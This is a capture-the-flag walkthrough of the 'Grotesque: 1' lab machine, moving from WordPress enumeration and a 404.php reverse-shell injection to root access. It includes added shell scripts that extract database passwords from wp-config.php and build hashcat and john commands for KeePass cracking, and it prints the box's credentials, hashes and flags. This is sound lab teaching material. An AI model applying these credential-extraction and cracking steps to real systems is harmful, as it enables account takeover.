Last updated: 15 Apr 24 09:27:45 (UTC)

Grotesque 1

By Lawcky 05/03/24

Introduction

Grotesque: 1

Difficulty : Medium

Additional info:

Name: Grotesque: 1.0.1
Release date: 10 Mar 2021
Author: tasiyanci
Series: Grotesque


In this write-up

  • nmap
  • ffuf
  • steganography (binwalk)
  • md5sum & dd
  • wordpress & wpscan
  • RCE
  • Keepass file

Scans

fd642304af23fe4a55c9a707131a732b.png

b1f7574e2ef9e9e83f8960683b128834.png


Write-up

Information Gathering

ae84fcdb2d448c482d76e98a26f7c845.png

Fuzzing with ffuf: found nothing.

Port 66:

277bdf069705bb11f22676c9c329ac93.png

Found a download link to a zip file.

3b5eb6ff0a646bddf6c573d2620f3b30.png

This is an image, a candidate for steganography.

Steganography

Using binwalk:

31c675cbdb9e6b4b5f19a101eca8c840.png

First attempt to decode:

3659e3fa18768dc7175eddfeabe830e7.png

Second:

95b20b375c5182480a72904bda9a441c.png

This looks like some kind of assembly listing??..

All of that turned out to be a dead end.


The Project

In the project we find a lot of files inside _vvmlist with repeated content.

9356077f3a660193e8d38104617261a0.png

Let's see if there is anything unique in these files.

In the enormous output we find this:

067a33dfc9d08d398a6dd5dfef4c6dd4.png

47ae8d1f981f354f568f5a9bc5fb4a4b.png

Since it is a WordPress site, we can easily find the login page:

WPscan

f5e5deb425f8f59212589943ca929d10.png

with, apparently, an uppercase password.

We now need a username and an uppercase password. WordPress allows user enumeration.

Found a valid username using the author's name on the site:

377e5e1c9a35e6bb92948bb460dfc6ca.png

Now we need the password, which appears to be uppercase.

I created a wordlist using cewl, then converted it all to uppercase with dd (conv=ucase).

ad86ecc016d5c87067ae7fd1ac344c7b.png

Let's try the attack:

693750fee7686a4da6be41bddbdf72c8.png

That did not work. Let's try rockyou with the same uppercase conversion:

2a49d15c71a78dfde0fd9f1d108bf5e1.png

The solution was to copy the lyrics of one of the songs into a file, md5sum it WITH the trailing newline, then uppercase the digest to get the password… and the only thing pointing in that direction was a giga chad meme on the site… these chads are too much 😭

6bbf42f376cdef10cf292dfad855066a.png

61163b98284e5dacd28400d5874afdd4.png

I love it.
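The uppercase wordlist step and the lyrics trick above, as an added example (not from the original write-up). It shows the dd conv=ucase conversion used here (tr does the same job) and why hashing the lyrics file WITH its trailing newline matters: a saved text file ends in a newline byte that md5sum hashes too, so `printf '%s'` and the file on disk give different digests. The lyrics string is a constructed placeholder, not the song from the box.

```shell
#!/bin/sh
# Added example, not from the original write-up.
# Reproduces the password-derivation step: md5sum of a lyrics file, uppercased.
# The trailing newline is the trap: a file saved by an editor (or `cat > file`)
# ends in "\n", and md5sum hashes that byte too, so hash("lyrics") != hash("lyrics\n").

# Uppercase a wordlist the way the write-up did (dd conv=ucase).
# tr '[:lower:]' '[:upper:]' < in > out does the same thing.
uppercase_wordlist() {   # usage: uppercase_wordlist IN OUT
    dd if="$1" of="$2" conv=ucase 2>/dev/null
}

# Hex digest of stdin, uppercased (dd's transfer statistics kept off stderr).
md5_upper() {
    md5sum | cut -d' ' -f1 | dd conv=ucase 2>/dev/null
}

# Candidate as the write-up found it: the text followed by one newline,
# exactly what md5sum sees when run on a saved text file.
hash_with_newline() {
    printf '%s\n' "$1" | md5_upper
}

# Candidate without the newline, i.e. what `echo -n` / `printf '%s'` would give.
hash_without_newline() {
    printf '%s' "$1" | md5_upper
}

# Hash a real file as-is (trailing newline included if the file has one).
hash_file() {
    md5_upper < "$1"
}

main() {
    lyrics="placeholder lyrics, not the song from the box"   # constructed sample text
    tmp=$(mktemp)
    printf '%s\n' "$lyrics" > "$tmp"        # how pasted lyrics end up on disk
    echo "file on disk   : $(hash_file "$tmp")"
    echo "with newline   : $(hash_with_newline "$lyrics")"
    echo "without newline: $(hash_without_newline "$lyrics")"
    rm -f "$tmp"
}
main "$@"
```

The first two lines of output agree and the third differs; if a guess derived from text "should" work and does not, the newline is the first thing to check.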


Reverse Shell

Injecting the 404.php theme page:

aaa770e127a18e075ec12f7aa66730d3.png

The page is located at: http://IP/lyricsblog/wp-content/themes/twentytwentyone/404.php

aee0b055ebb7d3a022c1e74ebc50afbe.png


Privilege Escalation

Found a MySQL server in:

77f7b7cf6479eba11ece84aa7f56dd81.png

Credentials: raphael:_double_trouble_

mysql -h localhost -u raphael -p -D wordpress_db

Found this:

5ebf502788fa4e8e8220db4d74e52e71.png

erdalkomurcu:$P$BXHQZLhAms.Eo0DzlZRBKbyezUPDqf1

Could not crack it.

The user's Unix password was the same as the DB password.

ddca19dd4002d3ac447c209fa1d8b45c.png

First flag found: F6ACB21652E095630BB1BEBD1E587FE7
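Where the MySQL credentials above come from and how the reuse gets spotted, as an added example (not from the original write-up). WordPress stores its database settings in wp-config.php as define() constants; the script pulls them out of a constructed sample config (using the values found on this box), rebuilds the mysql command used above, and classifies the $P$ hash from the user table so it goes to the right cracker mode. That the credentials were read from wp-config.php is an assumption; the write-up shows it only as a screenshot.

```shell
#!/bin/sh
# Added example, not from the original write-up.
# WordPress keeps its database settings in plain text in wp-config.php:
#   define( 'DB_USER', '...' ); define( 'DB_PASSWORD', '...' ); ...
# After landing a web shell this is the first file to read, and the password is
# frequently reused for a local account (as it was for raphael on this box).

# Write a constructed wp-config.php fragment with the values found on the box.
write_sample_config() {   # usage: write_sample_config FILE
    cat > "$1" <<'EOF'
<?php
// constructed sample, not the real file from the box
define( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'raphael' );
define( 'DB_PASSWORD', '_double_trouble_' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
EOF
}

# Print the value of one define() constant (single or double quotes, optional spaces).
# Values that themselves contain a quote character are not handled.
wp_define() {   # usage: wp_define FILE CONSTANT
    sed -n "s/^[[:space:]]*define[[:space:]]*([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$1" | head -n 1
}

# Assemble the mysql invocation the write-up ran, from the config values.
wp_mysql_command() {   # usage: wp_mysql_command FILE
    printf 'mysql -h %s -u %s -p -D %s\n' \
        "$(wp_define "$1" DB_HOST)" "$(wp_define "$1" DB_USER)" "$(wp_define "$1" DB_NAME)"
}

# Classify a hash pulled from wp_users.user_pass so it goes to the right cracker mode.
wp_hash_kind() {   # usage: wp_hash_kind HASH
    case "$1" in
        '$P$'*|'$H$'*)   echo "phpass (hashcat -m 400, john --format=phpass)" ;;
        '$2y$'*|'$2a$'*) echo "bcrypt (hashcat -m 3200)" ;;
        *)               echo "unknown" ;;
    esac
}

main() {
    cfg=$(mktemp)
    write_sample_config "$cfg"
    echo "DB user    : $(wp_define "$cfg" DB_USER)"
    echo "DB password: $(wp_define "$cfg" DB_PASSWORD)"
    echo "connect    : $(wp_mysql_command "$cfg")"
    echo "user hash  : $(wp_hash_kind '$P$BXHQZLhAms.Eo0DzlZRBKbyezUPDqf1')"
    # Reuse check: try the DB password as the Unix password of the DB user
    # (su raphael, or ssh raphael@target) before spending time on the hash.
    rm -f "$cfg"
}
main "$@"
```

On this box the reuse check is what paid off: the phpass hash never cracked, but the DB password logged in as raphael directly.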


Keepass

Found in raphael's home directory:

b300b16109c4e4e5ad11bc8f89560629.png

It is a KeePass password manager database.

We extract its hash using keepass2john:

$keepass$*2*60000*0*d34ff0b3bbce285d4553b994d1377a942145c2066611eeec2b4de8359f92d18c*e1ae12738ee79dabedfaf7f387275bfb4afc77b6943d02c156eabfaac3c2e58b*638b2e50ed9f0e910f7a96dbeb990c6d*4779254b4e0535bbfa31cf2d31a8ef86033ddbc13be2a5b25e9b0b5983448681*d32ea132be90e65089bfb5c7b6fee69019ada50b62d2e11c6d77d92f2856ba1c

Then crack it using hashcat:

2ba3a3f6fe808662976ea3ac86d89869.png

The master password is chatter.
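What the keepass2john line above actually contains, as an added example (not from the original write-up): a small POSIX shell parser over the hash from this box that reports the KDBX version, the transform-round count that makes every guess expensive, the cipher id and the IV length, and prints the hashcat (-m 13400) and john (--format=KeePass) invocations for this hash type. The field layout is that of keepass2john's KDBX output; the wordlist path and output file name are assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up.
# keepass2john does not extract a "password hash"; it copies the KDBX header fields
# a cracker needs to test master-password guesses offline, joined by '*':
#   $keepass$*<version>*<rounds>*<algorithm>*<masterseed>*<transformseed>*<iv>*<expectedstartbytes>*<contentshash>
# version 2 = KDBX (KeePass 2.x), algorithm 0 = AES. Nothing in it is secret; the
# rounds field is the key-transformation count, i.e. the cost of each guess.

# The hash the write-up extracted from raphael's database.
HASH='$keepass$*2*60000*0*d34ff0b3bbce285d4553b994d1377a942145c2066611eeec2b4de8359f92d18c*e1ae12738ee79dabedfaf7f387275bfb4afc77b6943d02c156eabfaac3c2e58b*638b2e50ed9f0e910f7a96dbeb990c6d*4779254b4e0535bbfa31cf2d31a8ef86033ddbc13be2a5b25e9b0b5983448681*d32ea132be90e65089bfb5c7b6fee69019ada50b62d2e11c6d77d92f2856ba1c'

# N-th field after the "$keepass$" tag (1-based).
keepass_field() {   # usage: keepass_field HASH N
    printf '%s\n' "$1" | cut -d'*' -f"$(( $2 + 1 ))"
}
keepass_version() { keepass_field "$1" 1; }
keepass_rounds()  { keepass_field "$1" 2; }
keepass_cipher() {
    case "$(keepass_field "$1" 3)" in
        0) echo AES ;;
        *) echo "other (see keepass2john source for the id)" ;;
    esac
}
# IV length is a quick sanity check: 16 bytes (32 hex chars) for AES-CBC.
keepass_iv_bytes() {
    iv=$(keepass_field "$1" 6)
    echo $(( ${#iv} / 2 ))
}

# Cracker invocations for this hash type (assumed file and wordlist names).
keepass_crack_commands() {
    echo "hashcat -m 13400 -a 0 keepass.hash /usr/share/wordlists/rockyou.txt"
    echo "john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt keepass.hash"
}

main() {
    echo "version : $(keepass_version "$HASH")"
    echo "rounds  : $(keepass_rounds "$HASH")   (AES key transformations per guess)"
    echo "cipher  : $(keepass_cipher "$HASH")"
    echo "iv bytes: $(keepass_iv_bytes "$HASH")"
    keepass_crack_commands
}
main "$@"
```

60000 rounds is the KeePass 2.x default of its era; a database with a higher count, or the newer Argon2 KDF, would make the same rockyou run take proportionally longer, which is why the rounds field is worth reading before starting a crack.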

Root password:

cec2ef956308e4f3f5b92721b2256be6.png

root:.:.subjective.:.

b87037c78abcc6f998429f57f94e047f.png

Second flag found: AF7DD472654CBBCF87D3D7F509CB9862